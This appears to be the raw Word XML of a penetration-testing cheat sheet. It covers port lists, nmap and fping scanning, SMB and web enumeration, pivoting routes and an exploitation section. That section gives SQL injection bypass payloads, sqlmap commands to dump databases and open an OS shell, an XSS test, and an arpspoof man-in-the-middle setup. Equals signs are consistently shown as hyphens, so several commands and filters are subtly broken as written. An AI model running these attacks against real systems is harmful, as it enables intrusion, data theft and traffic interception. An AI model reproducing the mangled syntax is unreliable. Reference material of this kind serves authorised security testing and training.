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="288" w:lineRule="auto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1fim44uwi2pe" w:id="0"/>
      <w:bookmarkEnd w:id="0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Common Ports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x3s4bg3ol65f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TCP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="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0"/>
        <w:gridCol w:w="3020"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3620"/>
            <w:gridCol w:w="302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SSH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Telnet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SMTP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DNS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POP3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139 + 445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SMB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IMAP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5u6fjskxmkr6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UDP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="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5"/>
        <w:gridCol w:w="3785"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2855"/>
            <w:gridCol w:w="378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DNS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DHCP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DHCP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TFTP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SNMP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line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6685melp8ys3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Other Useful Ports</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="6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5"/>
        <w:gridCol w:w="4415"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2225"/>
            <w:gridCol w:w="441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1433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MS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3389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RDP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3306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line="288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dpsdh0mo83fx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Scanning and Enumeration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f9k37t81mhty" w:id="5"/>
      <w:bookmarkEnd w:id="5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Establish your IP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ifconfig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Use ifconfig to establish your IP. For example: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.14834235742228"/>
        <w:gridCol w:w="8800.3634686662"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="225.14834235742228"/>
            <w:gridCol w:w="8800.3634686662"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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ifconfig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tap0: flags-4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;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mtu 1500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        inet 192.168.193.70  netmask 255.255.255.0  broadcast 0.0.0.0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        inet6 fe80::c8f:29ff:feb4:5219  prefixlen 64  scopeid 0x20&lt;link&gt;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        ether 0e:8f:29:b4:52:19  txqueuelen 1000  (Ethernet)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        RX packets 14  bytes 1541 (1.5 KiB)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        RX errors 0  dropped 4  overruns 0  frame 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        TX packets 9  bytes 754 (754.0 B)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        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C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jem1bu7zwg4n" w:id="6"/>
      <w:bookmarkEnd w:id="6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Ping Sweeps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fping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="3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275"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="32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IPRANGE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040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-a only shows alive hosts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-g performs a ping sweep instead of a normal ping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6"/>
        <w:tblW w:w="5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525"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="5525"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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192.168.32.0/24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192.168.82.0 192.168.82.255</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A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You can also suppress warnings by directing the process standard error to /dev/null:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="7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860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="6860"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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192.168.32.0/24 2&gt;/dev/null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192.168.82.0 192.168.82.255 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052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pxi5gzk2xx1m" w:id="7"/>
      <w:bookmarkEnd w:id="7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Combining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fping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nmap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Using fping to discover hosts and directing it to an output file ips.txt:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="5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750"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="57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IPRANGE 2&gt;/dev/null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ips.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057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Then, use nmap to conduct a ping scan:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="3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395"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="33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-iL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ips.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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y0vk1l4rwjtz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Host Discovery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nmap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Perform a ping scan using -sn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>
        <w:tblW w:w="3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945"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="29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IPRANGE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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11"/>
        <w:tblW w:w="4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950"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="3950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200.200.0.0/16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200.200.123.1-12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172.16.12.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200.200.12-13.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You can also load files from an input list using -iL:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12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625"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="46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-iL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FILENAME.EXTENSION</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B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example, a file named hostlist.txt contains the following:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>
        <w:tblW w:w="2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720"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="272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192.168.32.0/24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172.16.12.*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200.200.123.1-12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071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The nmap command would then become:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>
        <w:tblW w:w="4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950"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="39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-iL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hostlist.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075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8v287isfpgwa" w:id="9"/>
      <w:bookmarkEnd w:id="9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Enumeration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nmap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each host on a network, you can run the following to enumerate it:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table15"/>
        <w:tblW w:w="5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850"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="48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-p-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-sV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&lt;IP address&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A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-p- scans all ports -p1-65535 o -p-65535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-Pn assumes all ports are open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-sC performs a script scan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-sV performs a version detection scan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.14997621941552"/>
        <w:gridCol w:w="8851.361834804207"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="174.14997621941552"/>
            <w:gridCol w:w="8851.361834804207"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="4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Full port enumeration outputted to file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-p-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-sV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192.168.1.24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-oN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initial_scan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First 1000 ports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1-1000 192.168.1.24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Service detection scan on /24 network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-sV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10.11.12.0/24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TCP connect scan on two targets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192.168.12.33,34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Full scan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all ports, syn/script/version scan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-T4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--open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-sV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--min-rate-1000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--max-retries-3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-p-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-oN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output_file 10.10.10.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F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dvbvc64xbcih" w:id="10"/>
      <w:bookmarkEnd w:id="10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Shares Enumeration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8arvdp23hvdl" w:id="11"/>
      <w:bookmarkEnd w:id="11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smbclient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List shares:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17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625"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="46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smbclient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//&lt;IP ADDRESS&gt;/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Mount share:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>
        <w:tblW w:w="4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730"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="473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smbclient //&lt;IP ADDRESS&gt;/&lt;SHARE&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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dzze7qttt5td" w:id="12"/>
      <w:bookmarkEnd w:id="12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enum4linux</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table19"/>
        <w:tblW w:w="4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055"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="40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enum4linux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&lt;IP ADDRESS&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D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dcvephyuy5vr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nmblookup</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>
        <w:tblW w:w="4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950"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="39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nmblookup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&lt;IP ADDRESS&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1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pj9dj9aykr9i" w:id="14"/>
      <w:bookmarkEnd w:id="14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nmap</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table21"/>
        <w:tblW w:w="6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305"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="63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smb-vuln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&lt;PORT&gt; &lt;IP ADDRESS&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5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3fg0ehffzvi8" w:id="15"/>
      <w:bookmarkEnd w:id="15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Banner Grabbing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jpqxwfh8ur4b" w:id="16"/>
      <w:bookmarkEnd w:id="16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netcat</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table22"/>
        <w:tblW w:w="4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055"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="40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nc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-nv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&lt;IP Address&gt; &lt;Port&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA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23"/>
        <w:tblW w:w="3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605"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="36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nc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-nv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192.168.1.24 80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x3brysvqmgz7" w:id="17"/>
      <w:bookmarkEnd w:id="17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openssl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(HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table24"/>
        <w:tblW w:w="6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855"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="58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openssl s_client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&lt;IP ADDRESS&gt;:443</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2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ogrwik2y5k5f" w:id="18"/>
      <w:bookmarkEnd w:id="18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Common Wireshark Filters</w:t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3.126553371131"/>
        <w:gridCol w:w="3049.791731202859"/>
        <w:gridCol w:w="3652.593526449634"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2323.126553371131"/>
            <w:gridCol w:w="3049.791731202859"/>
            <w:gridCol w:w="3652.593526449634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Filter by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ip.add -- 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ip.add -- 192.168.1.28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Filter by Destination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ip.dest -- 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ip.add -- 192.168.1.28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Filter by Source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ip.src -- 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ip.add -- 192.168.1.72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Filter by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tcp.port --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tcp.port -- 80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Filter by IP Address and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ip.addr -- IP ADDRESS and tcp.port -- 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ip.addr -- 10.9.0.1 and tcp.port -- 80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Filter by Request (HTTP/HTTPS)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request.method --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request.method -- "POST"</w:t>
            </w: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request.method -- "GET"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zbctrx5c0qic" w:id="19"/>
      <w:bookmarkEnd w:id="19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Web Enumeration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atfuk3evr9xb" w:id="20"/>
      <w:bookmarkEnd w:id="20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Directory Fuzzing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gobuster</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>
        <w:tblW w:w="5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075"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="50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gobuster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&lt;URL&gt;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&lt;WORDLIST&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD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.82495120677535"/>
        <w:gridCol w:w="8871.686859816848"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="153.82495120677535"/>
            <w:gridCol w:w="8871.686859816848"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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Directory scan against one target using medium wordlist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gobuster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http://192.168.1.32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/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt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Directory scan against specific directory using custom wordlist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gobuster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http://192.168.5.24/confidential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custom_wordlist.txt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Directory scan with authentication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gobuster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dir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http://192.168.4.16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/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt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admin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8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2vc91wbfgmag" w:id="21"/>
      <w:bookmarkEnd w:id="21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Directory Fuzzing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dirb</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table28"/>
        <w:tblW w:w="3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3500"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="35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dirb &lt;URL&gt; &lt;WORDLIST&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC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.18485721808827"/>
        <w:gridCol w:w="8835.326953805536"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="190.18485721808827"/>
            <w:gridCol w:w="8835.326953805536"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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Directory scan against one target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dirb http://192.168.1.72/ /usr/share/wordlists/dirb/common.txt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Directory scan with authentication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dirb http://192.168.1.85/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01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"username:password"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/usr/share/wordlists/dirb/common.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4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xf2xqomrucc2" w:id="22"/>
      <w:bookmarkEnd w:id="22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Enumeration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nikto</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table30"/>
        <w:tblW w:w="2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495"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="24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nikto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-h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URL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8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31"/>
        <w:tblW w:w="4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400"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="44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nikto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-h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http://192.168.1.10/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC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gboh53i7kdyg" w:id="23"/>
      <w:bookmarkEnd w:id="23"/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whois</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table32"/>
        <w:tblW w:w="2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375"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="23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whois &lt;URL&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:line="288" w:lineRule="auto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w08nauejy8lb" w:id="24"/>
      <w:bookmarkEnd w:id="24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Routing and Pivoting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5jowgfshc036" w:id="25"/>
      <w:bookmarkEnd w:id="25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Clear Routing Table</w:t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To completely clear the routing table, run the following:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table33"/>
        <w:tblW w:w="2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045"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="20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route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Use this when setting up a route to make the destination and gateway more clear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i0costx0ewr8" w:id="26"/>
      <w:bookmarkEnd w:id="26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Show Routing Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9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On Windows (and Linux), you can use arp -a:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table34"/>
        <w:tblW w:w="2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1820"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="18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arp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And, on Linux, you can use ip route:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table35"/>
        <w:tblW w:w="2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045"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="20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ip route</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100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jqaryc7x32d2" w:id="27"/>
      <w:bookmarkEnd w:id="27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Setting up a Route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iproute</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table36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205"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="72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ip route add &lt;Network To Access&gt; via &lt;Gateway Address&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104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37"/>
        <w:tblW w:w="6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855"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="58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ip route add 192.168.1.0/24 via 10.10.22.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108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This adds a route to the 192.168.1.0/24 network via the 10.10.22.1 router.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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="80" w:line="288" w:lineRule="auto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48aez37k69do" w:id="28"/>
      <w:bookmarkEnd w:id="28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Exploitation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zyx8plqcp54" w:id="29"/>
      <w:bookmarkEnd w:id="29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Web Exploitation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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_udkq079olgq2" w:id="30"/>
      <w:bookmarkEnd w:id="30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Manual SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table38"/>
        <w:tblW w:w="6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4310"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2315"/>
            <w:gridCol w:w="431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4343c"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection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Basic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xx' UNION SELECT null; --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4343c"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic bypass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color w:val="34343c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sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">' or 1-1; --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cxllicthf6lh" w:id="31"/>
      <w:bookmarkEnd w:id="31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Automated Exploitation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sqlmap</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table39"/>
        <w:tblW w:w="5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750"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="57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sqlmap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&lt;URL&gt;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&lt;PARAMETER&gt;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options] </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116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40"/>
        <w:tblW w:w="8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660"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="8660"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="3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Display all tables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the database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sqlmap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http://10.10.0.1/index.php?id-47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Enumerate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id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parameter using the union technique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sqlmap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01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'http://192.168.1.72/index.php?id-10'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--technique-U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Dump database contents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sqlmap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01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'http://192.162.5.51/index.php?id-203'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--dump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Prompt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interactive OS shell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sqlmap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-u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01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'http://192.168.1.17/index.php?id-1'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-os-shell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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kj86ij5k4fwt" w:id="32"/>
      <w:bookmarkEnd w:id="32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Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126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Test inputs against XSS using:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table41"/>
        <w:tblW w:w="4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4055"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="755"/>
            <w:gridCol w:w="40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8">
            <w:pPr>
              <w:spacing w:after="260" w:lineRule="auto"/>
              <w:jc w:val="right"/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1717"/>
                <w:shd w:fill="e3d2d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alert("</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="d01040"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS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")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9926"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/script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a61717"/>
                <w:shd w:fill="e3d2d2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A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f0v4fqbjbfue" w:id="33"/>
      <w:bookmarkEnd w:id="33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Host Exploitation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fngecpcy1ual" w:id="34"/>
      <w:bookmarkEnd w:id="34"/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arpspoof</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D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First, tell your machine to forward packets to the destination host</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table42"/>
        <w:tblW w:w="5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405"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="54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/proc/sys/net/ipv4/ip_forward</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130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Then, run arpspoof:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table43"/>
        <w:tblW w:w="6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200"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="62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arpspoof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-i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&lt;INTERFACE&gt;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&lt;TARGET&gt;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&lt;HOST&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134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44"/>
        <w:tblW w:w="6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855"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="58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arpspoof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-i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tap0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10.10.5.1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10.10.5.7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_51ex2nio3d42" w:id="35"/>
      <w:bookmarkEnd w:id="35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Basic Metasploit Usage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A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Launch Metasploit by running:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table45"/>
        <w:tblW w:w="2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270"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="227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msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D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Basic commands:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table46"/>
        <w:tblW w:w="7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980"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="230"/>
            <w:gridCol w:w="6980"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
